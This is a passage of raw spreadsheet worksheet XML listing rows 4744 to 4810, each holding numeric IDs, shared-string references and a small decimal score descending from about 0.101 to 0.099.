    </row>
    <row r="4744" ht="15.75" customHeight="1">
      <c r="A4744" s="1">
        <v>30674.0</v>
      </c>
      <c r="B4744" s="2">
        <v>4.2246074E7</v>
      </c>
      <c r="C4744" s="2" t="s">
        <v>4530</v>
      </c>
      <c r="D4744" s="2">
        <v>1.0</v>
      </c>
      <c r="E4744" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4744" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4745" ht="15.75" customHeight="1">
      <c r="A4745" s="1">
        <v>30681.0</v>
      </c>
      <c r="B4745" s="2">
        <v>4238968.0</v>
      </c>
      <c r="C4745" s="2" t="s">
        <v>4531</v>
      </c>
      <c r="D4745" s="2">
        <v>1.0</v>
      </c>
      <c r="E4745" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4745" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4746" ht="15.75" customHeight="1">
      <c r="A4746" s="1">
        <v>33947.0</v>
      </c>
      <c r="B4746" s="2">
        <v>9298531.0</v>
      </c>
      <c r="C4746" s="2" t="s">
        <v>4532</v>
      </c>
      <c r="D4746" s="2">
        <v>1.0</v>
      </c>
      <c r="E4746" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4746" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="4747" ht="15.75" customHeight="1">
      <c r="A4747" s="1">
        <v>4942.0</v>
      </c>
      <c r="B4747" s="2">
        <v>4.4035764E7</v>
      </c>
      <c r="C4747" s="2" t="s">
        <v>4533</v>
      </c>
      <c r="D4747" s="2">
        <v>1.0</v>
      </c>
      <c r="E4747" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4747" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="4748" ht="15.75" customHeight="1">
      <c r="A4748" s="1">
        <v>26334.0</v>
      </c>
      <c r="B4748" s="2">
        <v>1.6730869E7</v>
      </c>
      <c r="C4748" s="2" t="s">
        <v>4534</v>
      </c>
      <c r="D4748" s="2">
        <v>1.0</v>
      </c>
      <c r="E4748" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4748" s="2">
        <v>0.1007532956685499</v>
      </c>
    </row>
    <row r="4749" ht="15.75" customHeight="1">
      <c r="A4749" s="1">
        <v>31771.0</v>
      </c>
      <c r="B4749" s="2">
        <v>5219083.0</v>
      </c>
      <c r="C4749" s="2" t="s">
        <v>4535</v>
      </c>
      <c r="D4749" s="2">
        <v>1.0</v>
      </c>
      <c r="E4749" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4749" s="2">
        <v>0.1005747126436782</v>
      </c>
    </row>
    <row r="4750" ht="15.75" customHeight="1">
      <c r="A4750" s="1">
        <v>5958.0</v>
      </c>
      <c r="B4750" s="2">
        <v>4.7289204E7</v>
      </c>
      <c r="C4750" s="2" t="s">
        <v>4536</v>
      </c>
      <c r="D4750" s="2">
        <v>1.0</v>
      </c>
      <c r="E4750" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4750" s="2">
        <v>0.1005747126436781</v>
      </c>
    </row>
    <row r="4751" ht="15.75" customHeight="1">
      <c r="A4751" s="1">
        <v>19902.0</v>
      </c>
      <c r="B4751" s="2">
        <v>5.7337617E7</v>
      </c>
      <c r="C4751" s="2" t="s">
        <v>4537</v>
      </c>
      <c r="D4751" s="2">
        <v>1.0</v>
      </c>
      <c r="E4751" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4751" s="2">
        <v>0.1005747126436781</v>
      </c>
    </row>
    <row r="4752" ht="15.75" customHeight="1">
      <c r="A4752" s="1">
        <v>598.0</v>
      </c>
      <c r="B4752" s="2">
        <v>1.9214374E7</v>
      </c>
      <c r="C4752" s="2" t="s">
        <v>4538</v>
      </c>
      <c r="D4752" s="2">
        <v>1.0</v>
      </c>
      <c r="E4752" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4752" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="4753" ht="15.75" customHeight="1">
      <c r="A4753" s="1">
        <v>4953.0</v>
      </c>
      <c r="B4753" s="2">
        <v>4.4053344E7</v>
      </c>
      <c r="C4753" s="2" t="s">
        <v>4539</v>
      </c>
      <c r="D4753" s="2">
        <v>1.0</v>
      </c>
      <c r="E4753" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4753" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="4754" ht="15.75" customHeight="1">
      <c r="A4754" s="1">
        <v>5101.0</v>
      </c>
      <c r="B4754" s="2">
        <v>4.4518757E7</v>
      </c>
      <c r="C4754" s="2" t="s">
        <v>4540</v>
      </c>
      <c r="D4754" s="2">
        <v>1.0</v>
      </c>
      <c r="E4754" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4754" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="4755" ht="15.75" customHeight="1">
      <c r="A4755" s="1">
        <v>6544.0</v>
      </c>
      <c r="B4755" s="2">
        <v>4.8854031E7</v>
      </c>
      <c r="C4755" s="2" t="s">
        <v>4541</v>
      </c>
      <c r="D4755" s="2">
        <v>1.0</v>
      </c>
      <c r="E4755" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4755" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="4756" ht="15.75" customHeight="1">
      <c r="A4756" s="1">
        <v>15992.0</v>
      </c>
      <c r="B4756" s="2">
        <v>4.4940245E7</v>
      </c>
      <c r="C4756" s="2" t="s">
        <v>4542</v>
      </c>
      <c r="D4756" s="2">
        <v>1.0</v>
      </c>
      <c r="E4756" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4756" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="4757" ht="15.75" customHeight="1">
      <c r="A4757" s="1">
        <v>28169.0</v>
      </c>
      <c r="B4757" s="2">
        <v>2.4940757E7</v>
      </c>
      <c r="C4757" s="2" t="s">
        <v>4543</v>
      </c>
      <c r="D4757" s="2">
        <v>1.0</v>
      </c>
      <c r="E4757" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4757" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="4758" ht="15.75" customHeight="1">
      <c r="A4758" s="1">
        <v>1559.0</v>
      </c>
      <c r="B4758" s="2">
        <v>2.7652105E7</v>
      </c>
      <c r="C4758" s="2" t="s">
        <v>4544</v>
      </c>
      <c r="D4758" s="2">
        <v>1.0</v>
      </c>
      <c r="E4758" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4758" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="4759" ht="15.75" customHeight="1">
      <c r="A4759" s="1">
        <v>18325.0</v>
      </c>
      <c r="B4759" s="2">
        <v>5.2404322E7</v>
      </c>
      <c r="C4759" s="2" t="s">
        <v>4545</v>
      </c>
      <c r="D4759" s="2">
        <v>1.0</v>
      </c>
      <c r="E4759" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4759" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="4760" ht="15.75" customHeight="1">
      <c r="A4760" s="1">
        <v>20293.0</v>
      </c>
      <c r="B4760" s="2">
        <v>1.1265046E7</v>
      </c>
      <c r="C4760" s="2" t="s">
        <v>4546</v>
      </c>
      <c r="D4760" s="2">
        <v>1.0</v>
      </c>
      <c r="E4760" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4760" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="4761" ht="15.75" customHeight="1">
      <c r="A4761" s="1">
        <v>28431.0</v>
      </c>
      <c r="B4761" s="2">
        <v>2.6449988E7</v>
      </c>
      <c r="C4761" s="2" t="s">
        <v>4547</v>
      </c>
      <c r="D4761" s="2">
        <v>1.0</v>
      </c>
      <c r="E4761" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4761" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="4762" ht="15.75" customHeight="1">
      <c r="A4762" s="1">
        <v>19361.0</v>
      </c>
      <c r="B4762" s="2">
        <v>5.5459E7</v>
      </c>
      <c r="C4762" s="2" t="s">
        <v>4548</v>
      </c>
      <c r="D4762" s="2">
        <v>1.0</v>
      </c>
      <c r="E4762" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4762" s="2">
        <v>0.1</v>
      </c>
    </row>
    <row r="4763" ht="15.75" customHeight="1">
      <c r="A4763" s="1">
        <v>508.0</v>
      </c>
      <c r="B4763" s="2">
        <v>1.81501E7</v>
      </c>
      <c r="C4763" s="2" t="s">
        <v>4549</v>
      </c>
      <c r="D4763" s="2">
        <v>1.0</v>
      </c>
      <c r="E4763" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4763" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="4764" ht="15.75" customHeight="1">
      <c r="A4764" s="1">
        <v>6181.0</v>
      </c>
      <c r="B4764" s="2">
        <v>4.7905932E7</v>
      </c>
      <c r="C4764" s="2" t="s">
        <v>4550</v>
      </c>
      <c r="D4764" s="2">
        <v>1.0</v>
      </c>
      <c r="E4764" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4764" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="4765" ht="15.75" customHeight="1">
      <c r="A4765" s="1">
        <v>7405.0</v>
      </c>
      <c r="B4765" s="2">
        <v>5.1107061E7</v>
      </c>
      <c r="C4765" s="2" t="s">
        <v>4551</v>
      </c>
      <c r="D4765" s="2">
        <v>1.0</v>
      </c>
      <c r="E4765" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4765" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="4766" ht="15.75" customHeight="1">
      <c r="A4766" s="1">
        <v>14816.0</v>
      </c>
      <c r="B4766" s="2">
        <v>4.0950909E7</v>
      </c>
      <c r="C4766" s="2" t="s">
        <v>4552</v>
      </c>
      <c r="D4766" s="2">
        <v>1.0</v>
      </c>
      <c r="E4766" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4766" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="4767" ht="15.75" customHeight="1">
      <c r="A4767" s="1">
        <v>19710.0</v>
      </c>
      <c r="B4767" s="2">
        <v>5.6538503E7</v>
      </c>
      <c r="C4767" s="2" t="s">
        <v>4553</v>
      </c>
      <c r="D4767" s="2">
        <v>1.0</v>
      </c>
      <c r="E4767" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4767" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="4768" ht="15.75" customHeight="1">
      <c r="A4768" s="1">
        <v>303.0</v>
      </c>
      <c r="B4768" s="2">
        <v>1.5554509E7</v>
      </c>
      <c r="C4768" s="2" t="s">
        <v>4554</v>
      </c>
      <c r="D4768" s="2">
        <v>1.0</v>
      </c>
      <c r="E4768" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4768" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="4769" ht="15.75" customHeight="1">
      <c r="A4769" s="1">
        <v>11590.0</v>
      </c>
      <c r="B4769" s="2">
        <v>2.2892283E7</v>
      </c>
      <c r="C4769" s="2" t="s">
        <v>4555</v>
      </c>
      <c r="D4769" s="2">
        <v>1.0</v>
      </c>
      <c r="E4769" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4769" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="4770" ht="15.75" customHeight="1">
      <c r="A4770" s="1">
        <v>17599.0</v>
      </c>
      <c r="B4770" s="2">
        <v>5.0342492E7</v>
      </c>
      <c r="C4770" s="2" t="s">
        <v>4556</v>
      </c>
      <c r="D4770" s="2">
        <v>1.0</v>
      </c>
      <c r="E4770" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4770" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="4771" ht="15.75" customHeight="1">
      <c r="A4771" s="1">
        <v>19799.0</v>
      </c>
      <c r="B4771" s="2">
        <v>5.6853551E7</v>
      </c>
      <c r="C4771" s="2" t="s">
        <v>4557</v>
      </c>
      <c r="D4771" s="2">
        <v>1.0</v>
      </c>
      <c r="E4771" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4771" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="4772" ht="15.75" customHeight="1">
      <c r="A4772" s="1">
        <v>10972.0</v>
      </c>
      <c r="B4772" s="2">
        <v>1.7333682E7</v>
      </c>
      <c r="C4772" s="2" t="s">
        <v>4558</v>
      </c>
      <c r="D4772" s="2">
        <v>1.0</v>
      </c>
      <c r="E4772" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4772" s="2">
        <v>0.09979423868312756</v>
      </c>
    </row>
    <row r="4773" ht="15.75" customHeight="1">
      <c r="A4773" s="1">
        <v>1918.0</v>
      </c>
      <c r="B4773" s="2">
        <v>3.0038584E7</v>
      </c>
      <c r="C4773" s="5" t="s">
        <v>4559</v>
      </c>
      <c r="D4773" s="2">
        <v>1.0</v>
      </c>
      <c r="E4773" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4773" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="4774" ht="15.75" customHeight="1">
      <c r="A4774" s="1">
        <v>7287.0</v>
      </c>
      <c r="B4774" s="2">
        <v>5.0797251E7</v>
      </c>
      <c r="C4774" s="2" t="s">
        <v>4560</v>
      </c>
      <c r="D4774" s="2">
        <v>1.0</v>
      </c>
      <c r="E4774" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4774" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="4775" ht="15.75" customHeight="1">
      <c r="A4775" s="1">
        <v>12767.0</v>
      </c>
      <c r="B4775" s="2">
        <v>3.1253928E7</v>
      </c>
      <c r="C4775" s="2" t="s">
        <v>4561</v>
      </c>
      <c r="D4775" s="2">
        <v>1.0</v>
      </c>
      <c r="E4775" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4775" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="4776" ht="15.75" customHeight="1">
      <c r="A4776" s="1">
        <v>14640.0</v>
      </c>
      <c r="B4776" s="2">
        <v>4.0354266E7</v>
      </c>
      <c r="C4776" s="2" t="s">
        <v>4562</v>
      </c>
      <c r="D4776" s="2">
        <v>1.0</v>
      </c>
      <c r="E4776" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4776" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="4777" ht="15.75" customHeight="1">
      <c r="A4777" s="1">
        <v>16483.0</v>
      </c>
      <c r="B4777" s="2">
        <v>4.652834E7</v>
      </c>
      <c r="C4777" s="2" t="s">
        <v>4563</v>
      </c>
      <c r="D4777" s="2">
        <v>1.0</v>
      </c>
      <c r="E4777" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4777" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="4778" ht="15.75" customHeight="1">
      <c r="A4778" s="1">
        <v>19084.0</v>
      </c>
      <c r="B4778" s="2">
        <v>5.4651961E7</v>
      </c>
      <c r="C4778" s="2" t="s">
        <v>4564</v>
      </c>
      <c r="D4778" s="2">
        <v>1.0</v>
      </c>
      <c r="E4778" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4778" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="4779" ht="15.75" customHeight="1">
      <c r="A4779" s="1">
        <v>14398.0</v>
      </c>
      <c r="B4779" s="2">
        <v>3.9173782E7</v>
      </c>
      <c r="C4779" s="2" t="s">
        <v>4565</v>
      </c>
      <c r="D4779" s="2">
        <v>1.0</v>
      </c>
      <c r="E4779" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4779" s="2">
        <v>0.09979423868312753</v>
      </c>
    </row>
    <row r="4780" ht="15.75" customHeight="1">
      <c r="A4780" s="1">
        <v>14091.0</v>
      </c>
      <c r="B4780" s="2">
        <v>3.7724922E7</v>
      </c>
      <c r="C4780" s="2" t="s">
        <v>4566</v>
      </c>
      <c r="D4780" s="2">
        <v>1.0</v>
      </c>
      <c r="E4780" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4780" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="4781" ht="15.75" customHeight="1">
      <c r="A4781" s="1">
        <v>19979.0</v>
      </c>
      <c r="B4781" s="2">
        <v>5.7609283E7</v>
      </c>
      <c r="C4781" s="2" t="s">
        <v>4567</v>
      </c>
      <c r="D4781" s="2">
        <v>1.0</v>
      </c>
      <c r="E4781" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4781" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="4782" ht="15.75" customHeight="1">
      <c r="A4782" s="1">
        <v>1149.0</v>
      </c>
      <c r="B4782" s="2">
        <v>2.4370301E7</v>
      </c>
      <c r="C4782" s="2" t="s">
        <v>4568</v>
      </c>
      <c r="D4782" s="2">
        <v>1.0</v>
      </c>
      <c r="E4782" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4782" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="4783" ht="15.75" customHeight="1">
      <c r="A4783" s="1">
        <v>2921.0</v>
      </c>
      <c r="B4783" s="2">
        <v>3.5847636E7</v>
      </c>
      <c r="C4783" s="2" t="s">
        <v>4569</v>
      </c>
      <c r="D4783" s="2">
        <v>1.0</v>
      </c>
      <c r="E4783" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4783" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="4784" ht="15.75" customHeight="1">
      <c r="A4784" s="1">
        <v>8176.0</v>
      </c>
      <c r="B4784" s="2">
        <v>5.3237968E7</v>
      </c>
      <c r="C4784" s="2" t="s">
        <v>4570</v>
      </c>
      <c r="D4784" s="2">
        <v>1.0</v>
      </c>
      <c r="E4784" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4784" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="4785" ht="15.75" customHeight="1">
      <c r="A4785" s="1">
        <v>12576.0</v>
      </c>
      <c r="B4785" s="2">
        <v>3.0011107E7</v>
      </c>
      <c r="C4785" s="2" t="s">
        <v>4571</v>
      </c>
      <c r="D4785" s="2">
        <v>1.0</v>
      </c>
      <c r="E4785" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4785" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="4786" ht="15.75" customHeight="1">
      <c r="A4786" s="1">
        <v>12970.0</v>
      </c>
      <c r="B4786" s="2">
        <v>3.2555003E7</v>
      </c>
      <c r="C4786" s="2" t="s">
        <v>4572</v>
      </c>
      <c r="D4786" s="2">
        <v>1.0</v>
      </c>
      <c r="E4786" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4786" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="4787" ht="15.75" customHeight="1">
      <c r="A4787" s="1">
        <v>14490.0</v>
      </c>
      <c r="B4787" s="2">
        <v>3.9625613E7</v>
      </c>
      <c r="C4787" s="2" t="s">
        <v>4573</v>
      </c>
      <c r="D4787" s="2">
        <v>1.0</v>
      </c>
      <c r="E4787" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4787" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="4788" ht="15.75" customHeight="1">
      <c r="A4788" s="1">
        <v>15388.0</v>
      </c>
      <c r="B4788" s="2">
        <v>4.2780974E7</v>
      </c>
      <c r="C4788" s="2" t="s">
        <v>4574</v>
      </c>
      <c r="D4788" s="2">
        <v>1.0</v>
      </c>
      <c r="E4788" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4788" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="4789" ht="15.75" customHeight="1">
      <c r="A4789" s="1">
        <v>16174.0</v>
      </c>
      <c r="B4789" s="2">
        <v>4.5646046E7</v>
      </c>
      <c r="C4789" s="2" t="s">
        <v>4575</v>
      </c>
      <c r="D4789" s="2">
        <v>1.0</v>
      </c>
      <c r="E4789" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4789" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="4790" ht="15.75" customHeight="1">
      <c r="A4790" s="1">
        <v>18196.0</v>
      </c>
      <c r="B4790" s="2">
        <v>5.2033461E7</v>
      </c>
      <c r="C4790" s="2" t="s">
        <v>4576</v>
      </c>
      <c r="D4790" s="2">
        <v>1.0</v>
      </c>
      <c r="E4790" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4790" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="4791" ht="15.75" customHeight="1">
      <c r="A4791" s="1">
        <v>29163.0</v>
      </c>
      <c r="B4791" s="2">
        <v>3.0627426E7</v>
      </c>
      <c r="C4791" s="2" t="s">
        <v>4577</v>
      </c>
      <c r="D4791" s="2">
        <v>1.0</v>
      </c>
      <c r="E4791" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4791" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="4792" ht="15.75" customHeight="1">
      <c r="A4792" s="1">
        <v>31662.0</v>
      </c>
      <c r="B4792" s="2">
        <v>5.1755636E7</v>
      </c>
      <c r="C4792" s="2" t="s">
        <v>4578</v>
      </c>
      <c r="D4792" s="2">
        <v>1.0</v>
      </c>
      <c r="E4792" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4792" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="4793" ht="15.75" customHeight="1">
      <c r="A4793" s="1">
        <v>32332.0</v>
      </c>
      <c r="B4793" s="2">
        <v>5582904.0</v>
      </c>
      <c r="C4793" s="2" t="s">
        <v>4579</v>
      </c>
      <c r="D4793" s="2">
        <v>1.0</v>
      </c>
      <c r="E4793" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4793" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="4794" ht="15.75" customHeight="1">
      <c r="A4794" s="1">
        <v>32652.0</v>
      </c>
      <c r="B4794" s="2">
        <v>5877448.0</v>
      </c>
      <c r="C4794" s="2" t="s">
        <v>4580</v>
      </c>
      <c r="D4794" s="2">
        <v>1.0</v>
      </c>
      <c r="E4794" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4794" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="4795" ht="15.75" customHeight="1">
      <c r="A4795" s="1">
        <v>8517.0</v>
      </c>
      <c r="B4795" s="2">
        <v>5.4073103E7</v>
      </c>
      <c r="C4795" s="2" t="s">
        <v>4581</v>
      </c>
      <c r="D4795" s="2">
        <v>1.0</v>
      </c>
      <c r="E4795" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4795" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="4796" ht="15.75" customHeight="1">
      <c r="A4796" s="1">
        <v>9453.0</v>
      </c>
      <c r="B4796" s="2">
        <v>5.5844044E7</v>
      </c>
      <c r="C4796" s="2" t="s">
        <v>4582</v>
      </c>
      <c r="D4796" s="2">
        <v>1.0</v>
      </c>
      <c r="E4796" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4796" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="4797" ht="15.75" customHeight="1">
      <c r="A4797" s="1">
        <v>15344.0</v>
      </c>
      <c r="B4797" s="2">
        <v>4.2616911E7</v>
      </c>
      <c r="C4797" s="2" t="s">
        <v>4583</v>
      </c>
      <c r="D4797" s="2">
        <v>1.0</v>
      </c>
      <c r="E4797" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4797" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="4798" ht="15.75" customHeight="1">
      <c r="A4798" s="1">
        <v>288.0</v>
      </c>
      <c r="B4798" s="2">
        <v>1.5463859E7</v>
      </c>
      <c r="C4798" s="2" t="s">
        <v>4584</v>
      </c>
      <c r="D4798" s="2">
        <v>1.0</v>
      </c>
      <c r="E4798" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4798" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4799" ht="15.75" customHeight="1">
      <c r="A4799" s="1">
        <v>341.0</v>
      </c>
      <c r="B4799" s="2">
        <v>1.5896019E7</v>
      </c>
      <c r="C4799" s="2" t="s">
        <v>4585</v>
      </c>
      <c r="D4799" s="2">
        <v>1.0</v>
      </c>
      <c r="E4799" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4799" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4800" ht="15.75" customHeight="1">
      <c r="A4800" s="1">
        <v>544.0</v>
      </c>
      <c r="B4800" s="2">
        <v>1.8727367E7</v>
      </c>
      <c r="C4800" s="2" t="s">
        <v>4586</v>
      </c>
      <c r="D4800" s="2">
        <v>1.0</v>
      </c>
      <c r="E4800" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4800" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4801" ht="15.75" customHeight="1">
      <c r="A4801" s="1">
        <v>588.0</v>
      </c>
      <c r="B4801" s="2">
        <v>1.9167272E7</v>
      </c>
      <c r="C4801" s="2" t="s">
        <v>4587</v>
      </c>
      <c r="D4801" s="2">
        <v>1.0</v>
      </c>
      <c r="E4801" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4801" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4802" ht="15.75" customHeight="1">
      <c r="A4802" s="1">
        <v>735.0</v>
      </c>
      <c r="B4802" s="2">
        <v>2.0806103E7</v>
      </c>
      <c r="C4802" s="2" t="s">
        <v>4588</v>
      </c>
      <c r="D4802" s="2">
        <v>1.0</v>
      </c>
      <c r="E4802" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4802" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4803" ht="15.75" customHeight="1">
      <c r="A4803" s="1">
        <v>776.0</v>
      </c>
      <c r="B4803" s="2">
        <v>2.1108701E7</v>
      </c>
      <c r="C4803" s="2" t="s">
        <v>4589</v>
      </c>
      <c r="D4803" s="2">
        <v>1.0</v>
      </c>
      <c r="E4803" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4803" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4804" ht="15.75" customHeight="1">
      <c r="A4804" s="1">
        <v>1154.0</v>
      </c>
      <c r="B4804" s="2">
        <v>2.4434089E7</v>
      </c>
      <c r="C4804" s="2" t="s">
        <v>4590</v>
      </c>
      <c r="D4804" s="2">
        <v>1.0</v>
      </c>
      <c r="E4804" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4804" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4805" ht="15.75" customHeight="1">
      <c r="A4805" s="1">
        <v>1254.0</v>
      </c>
      <c r="B4805" s="2">
        <v>2.5207648E7</v>
      </c>
      <c r="C4805" s="2" t="s">
        <v>4591</v>
      </c>
      <c r="D4805" s="2">
        <v>1.0</v>
      </c>
      <c r="E4805" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4805" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4806" ht="15.75" customHeight="1">
      <c r="A4806" s="1">
        <v>1426.0</v>
      </c>
      <c r="B4806" s="2">
        <v>2.6592092E7</v>
      </c>
      <c r="C4806" s="2" t="s">
        <v>4592</v>
      </c>
      <c r="D4806" s="2">
        <v>1.0</v>
      </c>
      <c r="E4806" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4806" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4807" ht="15.75" customHeight="1">
      <c r="A4807" s="1">
        <v>1656.0</v>
      </c>
      <c r="B4807" s="2">
        <v>2.8152239E7</v>
      </c>
      <c r="C4807" s="2" t="s">
        <v>4593</v>
      </c>
      <c r="D4807" s="2">
        <v>1.0</v>
      </c>
      <c r="E4807" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4807" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4808" ht="15.75" customHeight="1">
      <c r="A4808" s="1">
        <v>1725.0</v>
      </c>
      <c r="B4808" s="2">
        <v>2.8714704E7</v>
      </c>
      <c r="C4808" s="2" t="s">
        <v>4594</v>
      </c>
      <c r="D4808" s="2">
        <v>1.0</v>
      </c>
      <c r="E4808" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4808" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4809" ht="15.75" customHeight="1">
      <c r="A4809" s="1">
        <v>1911.0</v>
      </c>
      <c r="B4809" s="2">
        <v>3.0016827E7</v>
      </c>
      <c r="C4809" s="2" t="s">
        <v>4595</v>
      </c>
      <c r="D4809" s="2">
        <v>1.0</v>
      </c>
      <c r="E4809" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4809" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4810" ht="15.75" customHeight="1">
      <c r="A4810" s="1">
        <v>1919.0</v>
      </c>
      <c r="B4810" s="2">
        <v>3.0045659E7</v>
      </c>
      <c r="C4810" s="2" t="s">
        <v>4596</v>
      </c>
      <c r="D4810" s="2">
        <v>1.0</v>
      </c>
      <c r="E4810" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4810" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
